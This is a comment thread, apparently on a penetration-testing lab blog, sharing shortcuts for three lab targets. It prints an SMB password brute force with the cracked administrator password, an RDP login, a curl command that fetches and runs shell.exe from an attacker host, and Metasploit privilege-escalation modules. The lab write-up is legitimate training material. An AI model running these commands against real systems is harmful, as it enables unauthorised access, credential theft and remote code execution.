Blog Post
For target 1 there was an much easier way:
just bruteforce the password of the administrator and login as administrator.
┌──(kali㉿iml-kali)-[~/Desktop]
└─$ nxc smb 10.102.139.31 -u administrator -p /usr/share/wordlists/rockyou.txt
SMB 10.102.139.31 445 IML-WIN1018 [*] Windows 10 / Server 2016 Build 17134 x64 (name:IML-WIN1018) (domain:IML-Win1018) (signing:False) (SMBv1:False)
...
SMB 10.102.139.31 445 IML-WIN1018 [+] IML-Win1018\administrator:blink182
then RDP to the box:
xfreerdp /v:10.102.139.31 /u:administrator /p:blink182 /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali
so, there's no need to use the IMLuser. But I admit, that would generate a lot of noise :)
for target 2 in the os-shell of sqlmap you can also use curl to transfer the files:
> curl http://10.102.12.205:8000/shell.exe -o c:\users\iis-admin\shell.exe
> c:\users\iis-admin\shell.exe
and I've used the exploit-suggester and the module exploit/windows/local/ms16_075_reflection_juicy to successfully escalate my privileges.
same for target 3:
create a file with msfvenom and transfer it to the target. and let the exploit-suggester running to just find out that exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move works :)
nice one steven . For the bruteforce, just remember that our rockyou.txt has been truncated to save space. this would not be feasible in real life, but good hack. As for the others, love the usage of Metasploit modules to escalate. Well done!
- steven8 days ago
Silver I
sure, in real life I would not use rockyou but the large password files :)
it's easy to process is in the background while you're looking manually for other ways.